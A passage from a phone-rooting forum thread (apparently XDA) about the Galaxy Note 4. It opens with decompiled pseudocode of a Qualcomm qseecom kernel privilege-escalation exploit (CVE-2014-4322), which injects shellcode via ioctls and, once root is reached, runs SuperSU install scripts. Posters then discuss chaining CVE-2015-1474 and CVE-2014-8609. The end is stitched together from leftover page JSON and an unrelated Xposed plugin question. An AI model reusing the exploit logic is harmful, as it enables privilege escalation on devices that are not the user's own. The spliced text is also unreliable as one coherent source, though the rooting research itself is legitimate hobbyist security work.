v54 = close(ptmx_fd);
v55 = getuid(v54);
v56 = printf("getuid: %d\n", v55);
if ( getuid(v56) )
{
puts("Error getting root");
result = 1;
}
else
{
system("/data/local/tmp/systemrw.sh");
system("/data/local/tmp/installsupersu.sh");
result = 0;
}
goto error;
}
sub_89F4();
*(int *)v85 = 1769437812;
v86 = 1769366884;
v87 = 25966;
memset(&v88, 0, 0x14u);
while ( 1 )
{
while ( 1 )
{
v93 = *(int *)v85;
v94 = v86;
v95 = v87;
v96 = *(int *)&v88;
v97 = v89;
v98 = v90;
v99 = v91;
v100 = v92;
v22 = ioctl(qseecom_fd, QSEECOM_IOCTL_APP_LOADED_QUERY_REQ, &v93);
if ( v22 )
{
v27 = (int *)_errno(v22, v23, v24);
strerror(*v27);
sub_89F4();
goto obtain_qseecom_mem;
}
sub_89F4();
puts("query failed. trying another app...");
if ( strcmp(v85, "tzwidevine") )
break;
strcpy(v85, "keymaster");
}
if ( strcmp(v85, "keymaster") )
break;
strcpy(v85, "tzsuntory");
}
if ( !strcmp(v85, "tzsuntory") )
{
puts("Error querying app");
goto getting_root;
}
obtain_qseecom_mem:
v64 = v63;
v65 = v20;
v66 = 2113929216;
v28 = ioctl(qseecom_fd, QSEECOM_IOCTL_SET_MEM_PARAM_REQ, &v64);
v31 = v28;
if ( v28 )
{
v57 = (int *)_errno(v28, v29, v30);
v58 = strerror(*v57);
printf("Error ioctl QSEECOM_IOCTL_SET_MEM_PARAM_REQ: %d / %s\n", v31, v58);
}
else
{
sub_89F4();
}
munmap(v20, 2113929216);
v32 = mmap(v20, 4096, 7, 50);
if ( v32 == -1 )
puts("Error allocating shared buf again");
memset((void *)v32, 255, 0x1000u);
v77 = 0;
v79 = 0;
v78 = 0;
v81 = 0;
v80 = 0;
v83 = 0;
v82 = 0;
v73 = 2113921024;
v74 = v32 + 80;
v75 = 4096;
v76 = v63;
v72 = v32;
puts("getting ptr");
v33 = ioctl(qseecom_fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &v72);
if ( v33 )
{
v36 = (int *)_errno(v33, v34, v35);
strerror(*v36);
sub_89F4();
}
else
{
sub_89F4();
}
munmap(v32, 4096);
sub_89F4();
v37 = mmap(v20, 524288, 7, 49);
if ( v37 != -1 )
{
sub_89F4();
memset((void *)v37, 255, 0x80000u);
v72 = v32 + ((unsigned int)(v37 + 979369984) >> 1);
v77 = (unsigned int)(v37 + 979369984) >> 1;
puts("getting offset");
v38 = ioctl(qseecom_fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &v72);
if ( v38 )
{
v41 = (int *)_errno(v38, v39, v40);
strerror(*v41);
sub_89F4();
}
else
{
sub_89F4();
}
v42 = sub_8A00(v37, 524288);
munmap(v37, 524288);
v43 = mmap(*(int *)ion_void, 1024, 7, 49);
if ( v43 == -1 )
{
puts("Error: Could not allocate memory for exploit code");
}
else
{
v44 = (void *)v43;
sub_89F4();
memcpy(v44, sub_8994, 0x400u);
munmap(ion_void, 4096);
v45 = (int)((char *)v44 + 64);
do
{
while ( 1 )
{
v46 = *(int *)v44;
v44 = (char *)v44 + 4;
if ( v46 == -1091584273 )
break;
if ( v44 == (void *)v45 )
goto exploit_qseecom;
}
*((int *)v44 - 1) = sub_89A4;
}
while ( v44 != (void *)v45 );
exploit_qseecom:
v47 = v32 + ((unsigned int)(v37 + *(int *)(*(int *)v11 + 8) + 979370040 - v42) >> 1);
v77 = (unsigned int)(v37 + *(int *)(*(int *)v11 + 8) + 979370040 - v42) >> 1;
v72 = v47;
puts("exploiting");
v48 = ioctl(qseecom_fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &v72);
if ( v48 )
{
v51 = (int *)_errno(v48, v49, v50);
strerror(*v51);
sub_89F4();
}
else
{
sub_89F4();
}
}
goto getting_root;
}
puts("Error allocating testmem");
result = 1;
error:
if ( v102 != _stack_chk_guard )
_stack_chk_fail(result);
return result;
}
I am tried to construct but sorry I am not skilled in reverse enginering. If you understand than try to construct right function from that and share it here!
Click to expand...
Click to collapse
Making CVE-2014-4322 a universal one would be quite challenging since it provides write-anywhere without read. It is almost impossible to avoid hard coded offsets. It would be great if there is another read and write anywhere flaw which requires system priv.
ZPaul2Fresh8 said:
I understand, but what are the possible Broadcasts at our disposal? Whatever broadcast we send will be of System UID so maybe we can find something if we look hard enough?
I have Liang Chen (Team Keen (http://en.wikipedia.org/wiki/Pwn2Own#Contest_2014)) looking into CVE-2014-8609 to see if we can achieve System UID.
Click to expand...
Click to collapse
Okay I decided to try to invoke the android terminal intent to open a new terminal window as a system user. it doesn't work for me but other people on preOTA may be able to get it to work. I disabled the factory reset crap so don't worry about accidently factory resetting your device (like I did to my tablet before I disabled them). You will need to install the android terminal emulator app from the play store prior to opening this app and clicking the button. if you get a terminal window open type whoami and post a screenshot please. If not a simple post saying it doesn't work is fine.
Sent from my SAMSUNG-SM-N910A using Tapatalk
This one looking good https://android.googlesource.com/pl...5d3e74ecc2b973941d8adbe40c6b23094b5abb7^!/#F0
You can decompile settings.apk and search in src/com/android/settings/accounts/AddAccountSettings.smali to see if it is patched or not.
Hey I know it's already been stated but I wanted to confirm for myself. Confirmed... The string "checkAndGetTcObjectClass" exists in system.img.ext4 from NI1 that i pulled off of sammobile.com http://www.sammobile.com/firmwares/download/38838/N910VVRU1ANI1_N910VVZW1ANI1_VZW.zip/. Screenshot below.
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
Hi, I have implemented terminal emulator internaly into CVE-2014-8609.apk but from some unknown reasons it fail to start when I press "open terminal" button, I have spent 2 hours with this and I am lazy to debug more, sorry, try to decompile mine apk and fix it! Interesting thing I can start internal terminal emulator by command: "am start -n com.example.android.samplesync/jackpal.androidterm.Term", but clicking on button it no want to start
munjeni said:
I don't know, I stil receiving sms, only unable to get terminal emulator on button click
Click to expand...
Click to collapse
I don't understand it. I'm passing the intent the same way the sms intent and format interested t is passed back to the pending intent. It's just not working. I'm trying to make a service to hand it off to withing the app so that once it's intent is hit I can keep it alive in the background service, and then pull it back into the foreground to use it. In theory this should work even though the originating pending intent is killed shortly after the button press.
Sent from my SAMSUNG-SM-N910A using Tapatalk
stvn1337 said:
I don't understand it. I'm passing the intent the same way the sms intent and format interested t is passed back to the pending intent. It's just not working. I'm trying to make a service to hand it off to withing the app so that once it's intent is hit I can keep it alive in the background service, and then pull it back into the foreground to use it. In theory this should work even though the originating pending intent is killed shortly after the button press.
Sent from my SAMSUNG-SM-N910A using Tapatalk
Click to expand...
Click to collapse
Yes strange, when I click on "open terminal" it open settings, another clicks doing nothing until I kill app and lunch again, strange. Maybe we need to look into terminal emulator for this? I have no time now, but you can try to open another app?
It open com.google.android.c2dm.intent sucesfully but no terminal emulator, I don't know why.
munjeni said:
Yes strange, when I click on "open terminal" it open settings, another clicks doing nothing until I kill app and lunch again, strange. Maybe we need to look into terminal emulator for this? I have no time now, but you can try to open another app?
It open com.google.android.c2dm.intent sucesfully but no terminal emulator, I don't know why.
Click to expand...
Click to collapse
Your correct, I wonder if terminal emulator has been patched to prevent the broadAnywhere bug from launching it? If so then we need to find another terminal emulator that allows broadAnywhere to launch it with intents. Unless someone has time to search the terminal emulators source to figure out how it's been patched to prevent it..
Sent from my SAMSUNG-SM-N910A using Tapatalk
Maxninja said:
I did some research and googled the CVE-2014-4322 exploit and I stumbled on a forum for the Sony Xperia for them to achieve root with that exploit - http://forum.xda-developers.com/showthread.php?t=3011598
I don't know if it's useful but I hope it will help somewhere in the process for our phone to be rooted with the same exploit.
Click to expand...
Click to collapse
Yeah that was covered 50+ pages ago. That's the kernel side of it, we know that will work but first we have to get through the Android side first. That's what 1474 should do for us.
@soupmeister Yes. This is the best place.
windstrings said:
This brings the next question.. An educated guess as to whether this will work with lollipop?
Click to expand...
Click to collapse
I would be curious about this also, but only after root is out for pre-Lollipop. The description says through 5.0, which sounds to me like 5.0 is vulnerable but who knows if 5.0.1 or 5.0.2 is. Also Samsung, as we've seen recently with the root that works on other phones using those two CVEs not working on our phones, will backport fixes. I don't know how much Samsung is still tweaking their Lollipop update, but since this seems like a small fix, my money would be on it being fixed in the Samsung Lollipop update.
Btw I've been trying to upload the contents of system.img.ext4 from the AT&T and Verizon tar md5 files to Google Drive for easy reference but it keeps timing out and I don't want to post something missing random files. I'll try with a specialized uploader tool later.
Also CVE-2015-1474 was updated on the 17th to say that it's network exploitable(!) and I guess they gave it a 10.0 score, the highest! This seems to be more serious than that last "worst android bug ever" recently used for root in the last year.
I sure hope whatever tool that gives root that comes out also applies a fix for this. I wouldn't want to walk around with it if I could help it.
So after a bunch of useless posts basically asking to confirm this or thanking that..at least we can count on qcom to brighten our day...
https://www.codeaurora.org/projects...le-camera-drivers-cve-2014-4321-cve-2014-4324
Qcom camera FTW
Just a little further reading for some:
http://www.cvedetails.com/cve/CVE-2015-1474/
jcase said:
Would still require 1 or 2 additional vulns to exploit. Not so easy to get camera group in modern Android
Click to expand...
Click to collapse
Correct me if I am wrong but camera group should actually be rather easy to take advantage of especially in modern Android. In June this last year the play store rolled out an update that groups all applications for security permissions, so in theory, any app in this group can be used to exploit the vulnerability found. Which means all apps that take picture or record audio are on the table as they are all lumped in together with the camera group.
Basic example of what apps like this can do now that they are grouped.
Camera/Microphone: An app that has permission to take pictures and videos (for example, a camera app) can now gain the permission to record audio. The app could listen to you when you use other apps or when your device’s screen is off.
If this is true than someone much smarter than me should have a lot to fool around with.
jasonstackhouse said:
Correct me if I am wrong but camera group should actually be rather easy to take advantage of especially in modern Android. In June this last year the play store rolled out an update that groups all applications for security permissions, so in theory, any app in this group can be used to exploit the vulnerability found. Which means all apps that take picture or record audio are on the table as they are all lumped in together with the camera group.
Basic example of what apps like this can do now that they are grouped.
Camera/Microphone: An app that has permission to take pictures and videos (for example, a camera app) can now gain the permission to record audio. The app could listen to you when you use other apps or when your device’s screen is off.
If this is true than someone much smarter than me should have a lot to fool around with.
Click to expand...
Click to collapse
Ok I will. These "permission groups" from the play store have nothing to do with this. We are talking about a single android permission (android.permission.CAMERA) and a single linux group ("camera').
In 5.0, and many 4.x devices (i dont think it was all, it might have been all, i just dont care to find my notes, 10hr trip to take son to Dr and back, just got home and freaking tired) the linux group "camera" used in android was severed from the camera permission, declaring this permission does not put your user (app) into the camera group.
Simple test,
adb shell grep -A 10 -B 10 camera /system/etc/permissions/platform.xml
On blackphone (4.4.x), HTC Desire 510 (4.4.x) MotoX 2014 (5.0.x), the above command returned nothing.
One older devices, say 4.2.2 you would get teh following as the output:
<permission name="android.permission.CAMERA" >
<group gid="camera" />
</permission>
This means apps that are granded the permission, are put into the group "camera".
See:
https://android.googlesource.com/platform/frameworks/base/+/android-4.2.2_r1/data/etc/platform.xml
vs
https://android.googlesource.com/platform/frameworks/base/+/android-4.4.2_r1/data/etc/platform.xml
What does this mean? You cant directly talk to what you need to to exploit those camera vulns, you would need to exploit mediaserver, or escalate to system first (Which means squat, if you are system you have 100 ways to root that are easier than these camera bugs). Also must not forget about SEAndroid, might put a snag into it as well, but like ive said I just saw these today, and have been home for a whole 10minutes so far today.
Misterxtc said:
If it helps any this is what the adb command returned on the VZW Note4 on NJ5.
View attachment 3172812
Click to expand...
Click to collapse
Same here, AT&T NIE
C:\Users\rac1\Desktop\ADB>adb shell grep -A 10 -B 10 camera /system/etc/permissi
ons/platform.xml
<permission name="android.permission.SYSTEM_GROUP_INTERNAL" >
<group gid="system" />
</permission>
<permission name="android.permission.INTERNET" >
<group gid="inet" />
</permission>
<permission name="com.sec.android.permission.CAMERA" >
<group gid="camera" />
</permission>
<permission name="android.permission.READ_LOGS" >
<group gid="log" />
</permission>
<permission name="android.permission.READ_EXTERNAL_STORAGE" >
<group gid="sdcard_r" />
</permission>
--
<group gid="graphics" />
</permission>
<!-- Except for SysScope, DO NOT USE this permission. -->
<permission name="com.sec.android.app.sysscope.permission.ACCESS_SYSTEM_INFO
_SYSSCOPE_ONLY" >
<group gid="radio" />
</permission>
<!-- Group that can use gscaler -->
<permission name="com.sec.android.permission.USE_CAMERA" >
<group gid="camera" />
</permission>
<!-- ================================================================== -->
<!-- ================================================================== -->
<!-- ================================================================== -->
<!-- The following tags are assigning high-level permissions to specific
user IDs. These are used to allow specific core system users to
perform the given operations with the higher-level framework. For
example, we give a wide variety of permissions to the shell user
OK let's not forget about cve-2015-1474. This is the vulnerability that's going to get us what we want. Let's not get sidetracked about another vulnerability that we may not even need.
I'm a noob when it comes to both java and xposed, although I can more or less "read" java. I'm trying to create my first xposed plugin.
This is in the source (via jadx) from my original apk:
Code:
private void onHandle(byte[] data, int start, int length) {
byte b = data[start];
I wrote in my plugin:
Code:
findAndHookMethod("com.syu.ms.dev.ReceiverMcu", lpparam.classLoader, "onHandle", byte[].class, int.class, int.class, new XC_MethodHook() {
@Override
protected void beforeHookedMethod(XC_MethodHook.MethodHookParam param) throws Throwable {
[B]byte[] data = assetAsByteArray(param.thisObject, "byte[].class");[/B]
int start = getIntField(param.thisObject, "start");
int length = getIntField(param.thisObject, "length");
byte b = data[start];
....... etcetera .................
The bold part is what I need. I know that this line of code is wrong, but I'm already trying (monkey like) all kinds of constructions, but I always get an error.
How can I access that "byte[] data" from my original apk in my plugin?
The arguments are in 'param.args'. Since you want to access the first one, what you need is 'byte[] data = (byte[]) param.args[0];'
JoseRebelo said:
The arguments are in 'param.args'. Since you want to access the first one, what you need is 'byte[] data = (byte[]) param.args[0];'
Click to expand...
Click to collapse
Thanks a lot. It compiles fine now.
Now see if it really works